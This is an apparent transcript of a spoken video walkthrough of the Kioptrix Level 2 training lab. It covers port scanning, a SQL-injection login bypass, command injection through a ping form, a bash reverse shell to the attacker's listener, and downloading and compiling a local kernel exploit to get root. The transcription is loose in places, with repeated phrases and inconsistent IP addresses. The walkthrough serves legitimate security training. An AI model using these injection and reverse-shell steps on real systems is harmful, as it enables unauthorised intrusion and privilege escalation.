Hello and welcome to the series of these videos, and we will be covering at TJNull's the entire list of vulnerable machines, whether it be Vulhub or Hack the Box. So in the series of these videos, we will start from Kioptrix level 2, and I have already configured my machine and it is up and running. So let's start with the series and see how it goes. Okay, so we'll start from the basic. I have created a information tracking sheet around here where I'll be tracking up all the information. IP operating system, I have picked it from the siren, and let's do the first thing that we do when we see an IP address. Let's identify the IP address. Not discover and password for Pavan. Let's see. Okay, so this is VMware and this is our target. Let me divide the terminal. So IP equals 192.168.1.36, as I remember. Okay, let's do a quick nmap scanning. Nmap -sv -sc, and I have assigned the IP address to a variable. It is easy for me to call a variable whenever I want to, and this helps me out a lot because I don't have to type the IP address again and again. And again, I have picked it up from somewhere, I don't remember. And -sv is basically service version, script scanning, basic script scanning, -p-2 scan from port number 1 to 65,535, and --open, so that we can only perform script scanning when the port is open, and -v for verbosity. Let's do a quick scanning, and as we can see, we have discovered some interesting ports around here. We'll have to sort it out once if the scanning is done. So we have this port number 80, 443, HTTP and HTTPS both are available, and 3306 is MySQL, I remember. Okay, so let's just quickly copy and paste the nmap result around here. What we will do is we will start highlighting our important ports or whatever the information that is important to us. So this version, we have port 80 and the version of the Apache. We can later on check if the version of the Apache is vulnerable or not. So site does not have text. Okay, and we have RPC remote procedure call, RPC bind service name. Okay, 443 HTTPS. Again, the Apache version is same. What else do we have? 631 IPP. So we'll search about what CUPS 1.1 is. Okay, and we have 786. No idea about that port. Okay, and we have 786. No idea about that port. Okay, 786. I'll highlight this one, and 3306, which is MySQL. Okay. What we will do is we will keep a list around here where we are going to look what we will do, or whatever suits you. Even if you don't want to keep it, you can, but making such notes will help you out in summing up what you have done so far. So generally I don't keep, or generally people do not scan port 22, or we do not perform pen testing directly on port 22. We don't find it very informational. We'll see about if this version is vulnerable to any attacks. We'll start this. Okay, So we have port 80 and we have version. Okay, copy. We have version Apache HTTPD. What we can do is the basic thing, browsing the website and directory brute forcing. Okay, so we can perform a quick browsing on this website. We will do directory brute forcing, and we can check with this as well. Let's see, 111 TCP. Now, what else do we have? We have 443. We'll check this also. What else? 3. We'll check this also. What else do we have? 631, and there is some software called cups. Okay, and 786, and what else we have? 3306, which is MySQL. And at the end we have port 22, which of course we will take care of. Okay, so we'll start with port 80, and let's do a quick information gathering on this port 80, right? So the IP is 192.168.18.1.36, right? What I don't see it. Okay, so I don't see any hint around here about the operating system, but I know this is a Linux operating system. We'll see it later. Now what we can do is, as decided, we'll start browsing. So let's go to the website, which is http://192.168.1.36. Hit enter. Okay, so we have a remote system administration login, and what we are going to do is we will try to log in around here and see if we can log in. Let's try default passwords. Admin, nothing. Okay, let's try in caps. Admin, nothing. Okay, we'll try with SQL in admin, nothing. Okay, we'll try with SQL injection. If I open up a quick note around here, okay, what we can try is we can try some basic SQL injections, like passing up this, commenting out. We can use the comments around here, right? And we'll see if we can bypass something. Okay, so we'll start with basic and try to generate errors by passing dash. No error, no errors. What we can do is, first we will close the colon and then comment out. Let's try for this as well. Comment out, hit enter, and looks like it worked. So the thing that worked is this colon, and we commented out. So this is again hit and try method. It is out. So this is again hit and try method. It is nothing is foolproof that it will work, but it worked. Colon and dash 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 is basically commenting out the rest of the queries. For an example, we have from users select, let's say username admin and password admin, right? So what I did is, instead of admin, I passed this, right? And for the rest of the query, we commented out using dash dash. Now it will just check the user list and validate if that exists or not. in our case, we can use a Boolean SQL injection, but as of now it worked for us, so we don't have to bother about it. Now, after the commenting out, we'll see that this is not going to work. Okay, so we have already commented out, and since we have commented out, it validated the input, which is nothing, and successfully we logged in. So we have this admin console, so we'll understand the basic functionality of the website, and we'll move ahead. So ping a machine on the network. So it is asking us to ping a machine on the network. So what we can do is we can ping our own machine. Okay, let's have a quick look on the if config and 1.38. Okay, so let's copy this and let's go around here, paste it and submit, and we will verify. Okay, so 192.168.1.30, you look, it is pinging like 1 2 3 times, and after it is exiting. Now, generally, the ping command is not functionality of browser. It takes use of the system. If I show you around here, if I do ping 192.168.8 1.36, I'll use the same command and see. Okay, C is 3. Hit enter, and what we see is 1 2 3. Right, it is the same response. If you look, it is the same response as of the browser, pinging 3 times and responding with the result. I use this command. What else we can do with this? We can pass out next command. For example, if I do ls after it, right? Now, when I passed ls after this command using this semicolon, we will try the same thing with our browser and see if we can perform the same execution. Now we will use semicolon and we will do ls and hit enter. If you see the IP address is incorrect, so it did not execute, but ls was executed fine, and we get a result like this, right? We can do more like okay, more like cat etc password, hit enter, and let's wait for it. Okay, so now we have some information around here. We have root, we have Pegasus is no login, we have John and Harold. We have two more users, right? John and Harold, which we will put it in our comment section, and we will also mention around here. Okay, and we will also mention around here. Okay, admin panel, we logged in. So login ID and pass for admin panel was comma and dash dash and colon and dash dash. So this way we were able to log in. So I will highlight this for our future use or for reference. Okay, and for users, what users we have found is John and Harold. John and Harold. John and okay, so we have found two users. We don't have any credentials yet, and we have the last one root. So maybe someday it will help us to create a word list when we are attacking SSH or something. Okay. Since we are already able to execute the commands, we can verify if we can execute a bash reverse shell. Okay. Now I already have it around here. Payload all the things, and from here I can pick one bash shell, bash tcp. Let me go. I'll pick the first command only, and we will make modifications to it as per our use. Now we will try to take reverse shell. Okay, it is not possible for us to go back and forth again and again to execute a single command. So what we can do is, with this list, we can try any of the command. So I'm going one by one with this command. That is how we proceed. There is it is possible that all the commands does not work. So if it does not work, we will move to this. If it does not work, we'll move to this. If not work, we'll move to this. If this does not work, maybe we'll try something else. We will try to identify what kind of uh, uh, maybe programming language, maybe SOCAT, Perl, or maybe Python is being used around there, and we can utilize the functionality of that to take reverse shells. Let's start then. We'll have to edit. Okay, we'll start editing this command bash-i dev tcp, the IP address. So over here, we'll have to put the IP address of our machine 192.168.18. Sorry, .1.36. Okay, and the port, we can choose port of your own choice. For example, 4040 or 4444, whatever suits you. It does not matter. Okay. Now I'll copy this command and I'll paste this command in the browser instead of cat etc password. So I have pasted the command, but we have not set up a listener. We need the reverse shell, but for this we'll have to set up a listener. Let's set up listener netcat-nvlp, and the port we are using is 4040 as a listener's payload. And I'll hit submit, and we'll see if we get a connection back around here. Okay, so we will not get any connection back because the IP address I have entered is different. So it should be 38 instead of 36. So I'll modify it in the browser around here only. I'll click this, and instead of 36, I'll use 38, and I will also modify the port. Sometime if the commands are not executed successfully, the ports get engaged. So I will modify the ports around here as well. Okay, so let's see. Okay, so netcat-nv, and instead of this we have 1 2 3 4. Okay, hit enter. Now the listener is on the port. This time the IP address is correct. Let's go hit submit, and we'll monitor if we get a connection back. Okay, nothing. Okay, we won't get a connection because of this. Hit enter, and okay, successfully executed. Earlier it was 11, so I made a mistake around here. It is 1. Now we have a successful shell around here. If I, who am I am Apache. So you get a shell based on the kind of user you are accessing. For example, the browser was running in the server, so we accessed Apache only. From this point onwards, we have the basic access. What we need to do is we need to escalate our privileges. How to do that? We'll follow the basic steps of enumeration. So there are so many resources that you guys can find out if you are new to this field, or if you are doing it for the first time. You can always refer to just give me a second. Okay, so you can always refer to Kioptrix. Okay, so if you go to Kioptrix Linux privilege escalation, okay, you can start the commands and you'll get the result. But if you want, there are automated tools that will help us to identify the exploit needed to perform privilege escalation. Or if you want, you can make your own list and follow it. So there are so many resources out there which can be helpful for me. I'll go step by step from user information, and then OS information, and then the tools. So I'll do some basic enumeration. I'll check the ID. So we have the Apache Nuet. We have already seen the etc password. Now what we will do is cat etc and issue. We have some information around here. Welcome to Kioptrix Level 2 Pen Testing and Assessment Environment. Acquire root access to this. There are many ways this can be done. Try to find more than one way to appreciate. Okay, so there are many ways. So we will try to try to access whatever the first way that we get. We won't be exploring all the ways, but the first way that we can find. Now let's see. Let's see the release. Okay, so cat. We have etc release nothing. Okay, cat etc release. Okay, so this seems like CentOS release 4.5. Now I'll mention it around here. Okay, and I'll highlight it. Highlighting is always a good idea. Okay, what else we can check? We can check for cat proc version. Not mine. Proc version. Hit enter. Okay, so we have this Linux version. Okay, so we have Linux and 2.6.9. This is the exact version. What else? Since we have some basic information, let's start searching parallelly for the vulnerabilities and exploits as well. So Linux version 2.6.9. So what we'll do is we will try to search the exploit regarding this Linux kernel. So what we can do is search exploit Linux kernel 2.6, hit enter, and supposedly we will get a lot of. Okay, now if you see around here, we have a lot of suggestions, so we will try to find out the first appropriate version. Okay, so let's go one by one. This is for Solaris local privilege escalation. Ignore local privilege escalation 6.2, not for us. We need at least 2.6.9 or something else, or higher, or in between somewhere. This 2.6.x and local buffer overflow. No, we don't want buffer overflow, we want something else. Okay, so it's between 6.1 and 6.3.2 local pipe C. 6.3.2 local pipe C, local privilege escalation. So the first one is this 9844.py. So I'll mark this, I'll copy it up and paste it here. Okay, exploits, I will mark it out. Okay, so that is one. Okay, okay, it should be less than 2.6.32. It should work. And then we have around here. Okay, since we don't have the last 5 local denial of service, we actually don't need that. We are seeking for privilege escalation. Now this one 2.4.30 to 2.blue. Now we have this one, sand package local privilege escalation metasploit. So there is an exploit in metasploit as well from 2.6.0, and it should be less than 2.6.30 sand page. Okay, we can utilize this. Okay, I'll copy it and I'll paste it around here. Okay, memory disclosure, we don't want that. Ubuntu, okay, we have this also, 2.4.x to 2.6.x, and CentOS 4.85.3. Okay, what did we have? CentOS 4.5. CentOS. So it should be between 4.8 and 5.3. 4.8, 5.3. Okay, so we have found that there is an exploit which also mentions about CentOS version, right? Okay, so 9545.c. So I'll copy this one as well. Let me copy and I'll paste. Okay. So as of now, we have identified two exploit and to user privilege escalation 2.6.x. And this should also exploit. What we can do is we can start picking up one by one and see which one works for us. So instead of going more deeper, what I will do is I will quickly start downloading at least those ones which we have identified. Okay, now let's go and clear. Let's go to desktop and TJNull and cd TJNull mkdir Kioptrix 2 cd Kioptrix 2. Okay, doing this because I'd like to make it distinct. I don't want to confuse you guys with a lot of exploits in there. So what we can do is search exploit and hyphen guys with a lot of exploits in there. So what we can do is search exploit and hyphen m to mirror the exploit, and we'll start the first one. Okay, 9844.py. I'm not going with the metasploit in the beginning. We'll see in the last if we can use this if anything else does not work. Okay, 9844. Now we have it here. Okay, 9844.py. So this is the Python script. So we'll have to look if Linux version 2.6.9 or the version that we have hacked has Python. So which Python? Okay, so it has Python, so this might work. Let's go. Let's try to download it. If I do pwd and where we are www.htm, you can try downloading it here only. So first we'll have to create a server using the Python command, Python 3 -m and http.server. We'll have to use it as sudo and put it. Okay, so this way the Python will start serving immediately in the folder location that where we are executing it, and we can download anything from that folder if we have. So for example, how to download: wget ///192.168.1.8.1.38 and /9844.py 9844.py, and where I have to download in the same location. Download 0 bytes in 0 files. If I do ls, okay, so seems like resolving fail name or service unknown, and it says permission denied. So we don't have right permissions around here. Okay, so what we can do is we can go to cdp. Generally, we have permissions in the temp folder. Let's execute the same command in temp folder and see in the temp folder. Let's execute the same command in temp folder and see if that works. Hit enter, and resolving field name service unknown. Am I doing something wrong? Is my no, looks like HTTP request and pay thing. Okay, saved. So it is saved. 9844.py. Let's execute using Python. Hit enter. Okay, import subprocess. It failed. No module named subprocess. So it seems like it is using an old version of Python, maybe Python 2, and it does not have this module or something. No problem. Let's download it first. 9545.c. Okay, we will start the server again and we'll download again. wget http://192.168.1.38 and /9545.c 9545.c and current location. Okay, so it has been downloaded. If I do ls again, 9545.c, now we'll have to see if we have GCC. We have downloaded a C file, but if GCC is not there, we cannot compile and execute it. So which C? Okay, we don't. Okay, sorry, which GCC? Okay, we have GCC. Let's do it. GCC 9545.c and -o exploit. Okay, if I do ls, we have exploit. If I do ls-lsa, where is my exploit? Around here. Looks like this is executable. Let's execute ./expl exploit. Hit enter. No job control. However, it does say no job control in this shell. But if you see from bash, it is converted to sh, right? If I do who am I am root, right? So now we have root access. If you want to see cd root, and if I do ls, we have install configuration files and so on, right? Now we have access to the root folder and we are root user. If I do id, sorry, okay, if I do id, what am I? Root, gid and group. Of course it is Apache, right? So this is how you solve the Kioptrix level 2. Although this is not a big machine, but it is a good start to understand the basics of a few things, finding out the exploit and sharing the exploit using the Python, and executing the exploit if this is a C exploit, how to use GCC and so on, right? Have a good day, and I'll see you in the next video of the series, and I hope the next thing that we will be solving is maybe Kioptrix level 3. Have a good day, and I'll see you around.